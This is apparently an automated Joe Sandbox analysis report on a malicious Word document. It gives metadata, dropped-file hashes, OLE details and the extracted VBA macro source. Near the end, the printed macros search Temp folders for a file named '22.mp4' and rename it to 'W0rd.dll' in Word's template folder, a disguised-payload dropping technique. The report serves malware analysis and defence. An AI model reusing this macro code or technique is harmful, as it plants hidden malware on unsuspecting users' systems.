                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA23EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drfalse
                                                                                                                                                        high

                                                                                                                                                        Contacted IPs

                                                                                                                                                        No contacted IP infos

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                        Analysis ID:319766
                                                                                                                                                        Start date:18.11.2020
                                                                                                                                                        Start time:16:22:59
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 9m 8s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Sample file name:1118_8732615.doc
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Number of analysed new started processes analysed:34
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • GSI enabled (VBA)
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal64.expl.winDOC@1/7@0/0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .doc
                                                                                                                                                        Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 40.122.171.231, 168.61.161.212, 52.109.76.6, 52.109.76.36, 52.109.12.21, 51.11.168.160, 23.210.248.85, 205.185.216.42, 205.185.216.10, 20.54.26.129, 51.104.139.180, 92.122.213.194, 92.122.213.247, 52.155.217.156, 40.90.23.247, 40.90.23.206, 40.90.23.154, 40.90.23.153, 13.104.215.69, 13.104.215.72, 40.90.137.126, 40.90.137.127, 40.127.240.158, 51.11.168.232
                                                                                                                                                        • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, cds.d2s7q6s2.hwcdn.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolcus07.cloudapp.net, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                        Errors:
                                                                                                                                                        • Corrupt sample or wrongly selected analyzer.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        No simulations

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        No context

                                                                                                                                                        Domains

                                                                                                                                                        No context

                                                                                                                                                        ASN

                                                                                                                                                        No context

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):129952
                                                                                                                                                        Entropy (8bit):5.378331924167014
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:tcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:PmQ9DQW+zBX8u
                                                                                                                                                        MD5:4C5D6BFCD462D9677EBB3EDB85DFF67B
                                                                                                                                                        SHA1:C74E656C67C9B90D62FDBDB2F38ADD48478A019B
                                                                                                                                                        SHA-256:70BC1689EBA0C8647E2E344A9E0B0A0D2BA355C564B68DEC49F820C59649A100
                                                                                                                                                        SHA-512:8A831AA4E0C172A23B9C7D852EA52C09D1C5CA3DBBDFC0FDC3275E2CA68A4F1174ECB73CA6AC306BF9C34602E4980B2BD2CCB1FE012D4FD84F54D6093A8992B0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-18T15:23:50">.. Build: 16.0.13515.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4FAE44D.emf
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):5416
                                                                                                                                                        Entropy (8bit):2.0520805575447705
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:YISOayKbfoyVbs/qpBBBBBBBUBBBBBBqBBBBBBBUBBBBBBqBBBBBBBUBBBBBBqBJ:HVmbfogbsU07wgNgXalj+JL
                                                                                                                                                        MD5:5F98F862F370C31BD4AB71F758D11B14
                                                                                                                                                        SHA1:44221D1E056B5DB2C8EF8197CDE763F194A4657C
                                                                                                                                                        SHA-256:4F529AA95102406D4A45B29D7B418D2402817795602DCAE4A5F24C95E2123568
                                                                                                                                                        SHA-512:6DBE30CBE0BAACE1FBC5804E738B8ECBB1CABFD8E90D1FC0806F4EEBD23524E1E7CDE15E33EC8CE5C77ED0D88DB47F4BD288E749B0EE3507066FFCE95A13E8B0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: ....l... .......D....................... EMF....(.......................V.......i......................:...........................M...$...#.......B... ...#....... ... ..................?...........?................l...0........... ... ...(... ..."..............................................................?..................................................................................................3...7...7...?.M.......#.......B... ...#....... ... ...F.f............?...........?................l...4........... ... ...(... ... ..... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{58EC7C29-FC88-4CA2-A6C0-9123E4D0B0C9}.tmp
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1024
                                                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1118_8732615.doc.LNK
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Wed Nov 18 23:23:50 2020, atime=Wed Nov 18 23:23:47 2020, length=621568, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2130
                                                                                                                                                        Entropy (8bit):4.673135614679704
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:83O5j/7ShIK+AkW4D/W7aB6my3O5j/7ShIK+AkW4D/W7aB6m:83onSIOkWefB6p3onSIOkWefB6
                                                                                                                                                        MD5:6276BFEA591D8E37F6133FE9552DCF60
                                                                                                                                                        SHA1:BDE7914CD7675152B412A1DF97C3D203C7D61950
                                                                                                                                                        SHA-256:542298C8D97CEFE32A72BBF0AC7098B0EDFEDF78618CC496DA4A6CF1BFDD8369
                                                                                                                                                        SHA-512:7A8E66324467B218B3F803D3FC3FD12E18D3D070C5074BFFB8F5EB49C8394CB51596E21FC224A29DE86B978FA02DFE7944C7878FDF353F2596E54CEDA82B146E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: L..................F.... ...g-m.:......@.......?.....|...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQ......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.sQ.......S......................J.h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny.sQ.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2..|..sQ.. .1118_8~1.DOC..R......>QuxsQ......h.....................y#..1.1.1.8._.8.7.3.2.6.1.5...d.o.c.......V...............-.......U...........>.S......C:\Users\user\Desktop\1118_8732615.doc..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.1.1.8._.8.7.3.2.6.1.5...d.o.c.........:..,.LB.)...As...`.......X.......724536...........!a..%.H.VZAj...T..-.........-..!a..%.H.VZAj...T..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):86
                                                                                                                                                        Entropy (8bit):4.235670976640587
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:M1UUvlLBC+dclLBCmX1UUvlLBCv:Mea9py92a9s
                                                                                                                                                        MD5:F474223C2C879253F9A638B2D9E53BA6
                                                                                                                                                        SHA1:26645E4A3856BD5C8FEF7664B98E6A89E0FB20D3
                                                                                                                                                        SHA-256:6A1D2784F2E8DE87D55A5095EFE10C2B588B0E475CDDEA9F679064BACFD966DF
                                                                                                                                                        SHA-512:B113B497E5801661DEA171F60660C3A304F813A892512B70A92F1DA077096D9E175AB5CD3486809F8EC36AE557A652C34EE463D479E9A70D1D04EF51F5751DEF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: [doc]..1118_8732615.doc.LNK=0..1118_8732615.doc.LNK=0..[doc]..1118_8732615.doc.LNK=0..
                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.1073706520881803
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/Zd/btMztvtlbFzflqKmyl1/5:RtZ9+zxWA1B
                                                                                                                                                        MD5:9412CC0321BD5F055E6E6356E461865C
                                                                                                                                                        SHA1:870ECAFD5EC499D628DA7C40DE5DDA7077D69B5C
                                                                                                                                                        SHA-256:695A224B4078A4C81952EDBD75B4CC015EE6E7E7B873674EF9B80CDEF9B87A59
                                                                                                                                                        SHA-512:EC88BF93954204C0A479CCE1DCFF42572FCA0C6A3EF713E35386CCAE16E554BB2CADC18E59578A23398E17418B884BB95D1F73BF2040C7C17AA15447B669C470
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........................................................H.......6C......................$...
                                                                                                                                                        C:\Users\user\Desktop\~$18_8732615.doc
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.1073706520881803
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Rl/Zd/btMztvtlbFzflqKmyl1/5:RtZ9+zxWA1B
                                                                                                                                                        MD5:9412CC0321BD5F055E6E6356E461865C
                                                                                                                                                        SHA1:870ECAFD5EC499D628DA7C40DE5DDA7077D69B5C
                                                                                                                                                        SHA-256:695A224B4078A4C81952EDBD75B4CC015EE6E7E7B873674EF9B80CDEF9B87A59
                                                                                                                                                        SHA-512:EC88BF93954204C0A479CCE1DCFF42572FCA0C6A3EF713E35386CCAE16E554BB2CADC18E59578A23398E17418B884BB95D1F73BF2040C7C17AA15447B669C470
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h.........................................................H.......6C......................$...

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: BigAdministrator, Template: Normal.dotm, Last Saved By: BigAdministrator, Revision Number: 56, Name of Creating Application: Microsoft Office Word, Total Editing Time: 44:00, Create Time/Date: Thu Nov 12 08:27:00 2020, Last Saved Time/Date: Wed Nov 18 10:26:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
                                                                                                                                                        Entropy (8bit):6.608390292496962
                                                                                                                                                        TrID:
                                                                                                                                                        • Perfect Keyboard macro set (36024/1) 37.90%
                                                                                                                                                        • Microsoft Word document (32009/1) 33.68%
                                                                                                                                                        • Microsoft Word document (old ver.) (19008/1) 20.00%
                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 8.43%
                                                                                                                                                        File name:1118_8732615.doc
                                                                                                                                                        File size:619520
                                                                                                                                                        MD5:0f75ad40daec01aee7642795cc544bb3
                                                                                                                                                        SHA1:76334ccc6e92d579495671de47664180517cdf05
                                                                                                                                                        SHA256:afba9deb16b5100c5964ca33cd42c2aa6b972ad104efd3d58e0ad8b7070cd5f4
                                                                                                                                                        SHA512:53bc11170d518dc95baddf223370398971f740830e24d9b44b5e7bf61b99a3a62c680d3219bde489a5bb653629a3d7669d022444161b5b2badc6c9d09b2fecd3
                                                                                                                                                        SSDEEP:12288:9uE0gXPByytejpBOaFGyokkn7QljuI2hJdC3ZzoNSBr:9u3gXPQ2eXOaFefgCIn
                                                                                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OLE
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "1118_8732615.doc"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:True
                                                                                                                                                        Application Name:Microsoft Office Word
                                                                                                                                                        Encrypted Document:False
                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:True

                                                                                                                                                        Summary

                                                                                                                                                        Code Page:1252
                                                                                                                                                        Title:
                                                                                                                                                        Subject:
                                                                                                                                                        Author:BigAdministrator
                                                                                                                                                        Keywords:
                                                                                                                                                        Comments:
                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                        Last Saved By:BigAdministrator
                                                                                                                                                        Revion Number:56
                                                                                                                                                        Total Edit Time:2640
                                                                                                                                                        Create Time:2020-11-12 08:27:00
                                                                                                                                                        Last Saved Time:2020-11-18 10:26:00
                                                                                                                                                        Number of Pages:1
                                                                                                                                                        Number of Words:3
                                                                                                                                                        Number of Characters:19
                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                        Security:0

                                                                                                                                                        Document Summary

                                                                                                                                                        Document Code Page:1252
                                                                                                                                                        Number of Lines:1
                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                                                        Company:
                                                                                                                                                        Contains Dirty Links:False
                                                                                                                                                        Shared Document:False
                                                                                                                                                        Changed Hyperlinks:False
                                                                                                                                                        Application Version:1048576

                                                                                                                                                        Streams with VBA

                                                                                                                                                        VBA File Name: Module1.bas, Stream Size: 4151
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/Module1
                                                                                                                                                        VBA File Name:Module1.bas
                                                                                                                                                        Stream Size:4151
                                                                                                                                                        Data ASCII:. . . . . . . . . B . . . . . . . . . . . . . . . p . . . 4 . . . . . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:01 16 03 00 02 f0 00 00 00 42 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 70 05 00 00 34 0d 00 00 00 00 00 00 01 00 00 00 47 91 94 e0 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                        VBA Code Keywords

                                                                                                                                                        Keyword
                                                                                                                                                        lka(UUu
                                                                                                                                                        Object
                                                                                                                                                        "al\Te"
                                                                                                                                                        VB_Name
                                                                                                                                                        vbDirectory)
                                                                                                                                                        "Loc"
                                                                                                                                                        "mp",
                                                                                                                                                        RootPath
                                                                                                                                                        zxc(afs)
                                                                                                                                                        Getme(Left(ActiveDocument.AttachedTemplate.Path,
                                                                                                                                                        String
                                                                                                                                                        ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        String)
                                                                                                                                                        Selection.TypeBackspace
                                                                                                                                                        Nothing
                                                                                                                                                        myArr
                                                                                                                                                        ntgs)
                                                                                                                                                        lka(RootPath)
                                                                                                                                                        fld.SUBFOLDERS
                                                                                                                                                        Getme(RootPath
                                                                                                                                                        "Local\Temp")
                                                                                                                                                        While
                                                                                                                                                        ssss()
                                                                                                                                                        Function
                                                                                                                                                        CreateObject("Scripting.FileSystemObject")
                                                                                                                                                        Dir(RootPath
                                                                                                                                                        Getme(vhhs.Path)
                                                                                                                                                        Dir(Left(ActiveDocument.AttachedTemplate.Path,
                                                                                                                                                        Attribute
                                                                                                                                                        fso.GetFolder(asdf)
                                                                                                                                                        Getme
                                                                                                                                                        strFileExists
                                                                                                                                                        Dir(ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        VBA Code
                                                                                                                                                        Attribute VB_Name = "Module1"
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Sub ssss()
                                                                                                                                                        Dim ntgs
                                                                                                                                                        Dim sda
                                                                                                                                                        Call oo
                                                                                                                                                            ntgs = 50
                                                                                                                                                        sda = 49
                                                                                                                                                        Dim jos
                                                                                                                                                        
                                                                                                                                                        While sda < 50
                                                                                                                                                              ntgs = ntgs - 1
                                                                                                                                                              
                                                                                                                                                              If Dir(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then
                                                                                                                                                                
                                                                                                                                                            Else
                                                                                                                                                          
                                                                                                                                                           sda = 61
                                                                                                                                                            End If
                                                                                                                                                        
                                                                                                                                                           Wend
                                                                                                                                                           
                                                                                                                                                        Call Getme(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Local\Temp")
                                                                                                                                                          Selection.TypeBackspace
                                                                                                                                                           
                                                                                                                                                        
                                                                                                                                                        End Sub
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Function Getme(RootPath As String)
                                                                                                                                                        
                                                                                                                                                        Dim fso As Object
                                                                                                                                                        Dim fld As Object
                                                                                                                                                        Dim vhhs As Object
                                                                                                                                                        Dim afs As String
                                                                                                                                                        Dim myArr
                                                                                                                                                        Dim asdf
                                                                                                                                                        asdf = RootPath
                                                                                                                                                        Set fso = CreateObject("Scripting.FileSystemObject")
                                                                                                                                                        
                                                                                                                                                        Set fld = fso.GetFolder(asdf)
                                                                                                                                                        
                                                                                                                                                        strFileExists = Dir(RootPath & "\22.mp4")
                                                                                                                                                              If strFileExists = "" Then
                                                                                                                                                            
                                                                                                                                                        For Each vhhs In fld.SUBFOLDERS
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        afs = vhhs
                                                                                                                                                        
                                                                                                                                                                Call zxc(afs)
                                                                                                                                                            myArr = Getme(vhhs.Path)
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Next
                                                                                                                                                            Set vhhs = Nothing
                                                                                                                                                        Getme = Arr
                                                                                                                                                        
                                                                                                                                                        Set fld = Nothing
                                                                                                                                                        Set fso = Nothing
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                            Else
                                                                                                                                                              If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then
                                                                                                                                                              
                                                                                                                                                             
                                                                                                                                                           Call lka(RootPath)
                                                                                                                                                              Else
                                                                                                                                                              Exit Function
                                                                                                                                                          End If
                                                                                                                                                            
                                                                                                                                                                End If
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        End Function
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Sub lka(UUu As String)
                                                                                                                                                           Name UUu & "\22.mp4" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll"
                                                                                                                                                                      
                                                                                                                                                        End Sub
                                                                                                                                                        VBA File Name: Module2.bas, Stream Size: 2129
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Macros/VBA/Module2
                                                                                                                                                        VBA File Name:Module2.bas
                                                                                                                                                        Stream Size:2129
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:01 16 03 00 01 f0 00 00 00 0a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 11 03 00 00 dd 06 00 00 00 00 00 00 01 00 00 00 47 91 03 f5 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                        VBA Code Keywords

                                                                                                                                                        Keyword
                                                                                                                                                        Unit:=wdCharacter,
                                                                                                                                                        Dir(sf
                                                                                                                                                        VB_Name
                                                                                                                                                        ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        String)
                                                                                                                                                        Selection.TypeBackspace
                                                                                                                                                        Unit:=wdLine,
                                                                                                                                                        strFileExists
                                                                                                                                                        Selection.Copy
                                                                                                                                                        zxc(sf
                                                                                                                                                        Selection.MoveRight
                                                                                                                                                        Attribute
                                                                                                                                                        Selection.MoveDown
                                                                                                                                                        Dir(ActiveDocument.AttachedTemplate.Path
                                                                                                                                                        VBA Code
                                                                                                                                                        Attribute VB_Name = "Module2"
                                                                                                                                                        Sub oo()
                                                                                                                                                        Selection.MoveDown Unit:=wdLine, Count:=1
                                                                                                                                                            Selection.MoveRight Unit:=wdCharacter, Count:=5
                                                                                                                                                            Selection.MoveDown Unit:=wdLine, Count:=24
                                                                                                                                                            Selection.MoveRight Unit:=wdCharacter, Count:=50
                                                                                                                                                            Selection.MoveDown Unit:=wdLine, Count:=24
                                                                                                                                                            Selection.MoveRight Unit:=wdCharacter, Count:=5
                                                                                                                                                            Selection.MoveDown Unit:=wdLine, Count:=24
                                                                                                                                                            Selection.MoveRight Unit:=wdCharacter, Count:=50
                                                                                                                                                           Selection.TypeBackspace
                                                                                                                                                           Selection.Copy
                                                                                                                                                           
                                                                                                                                                        End Sub
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        
                                                                                                                                                        Sub zxc(sf As String)
                                                                                                                                                        strFileExists = Dir(sf & "\22.mp4")
                                                                                                                                                        
                                                                                                                                                              If strFileExists = "" Then
                                                                                                                                                            
                                                                                                                                                            Else
                                                                                                                                                                 If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then
                                                                                                                                                        
                                                                                                                                                                Name sf & "\22.mp4" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll"
                                                                                                                                                            Else
                                                                                                                                                           Exit Sub
                                                                                                                                                            End If
                                                                                                                                                          
                                                                                                                                                            End If
                                                                                                                                                        End Sub
                                                                                                                                                        VBA File Name: ThisDocument.cls, Stream Size: 1743
                                                                                                                                                        General
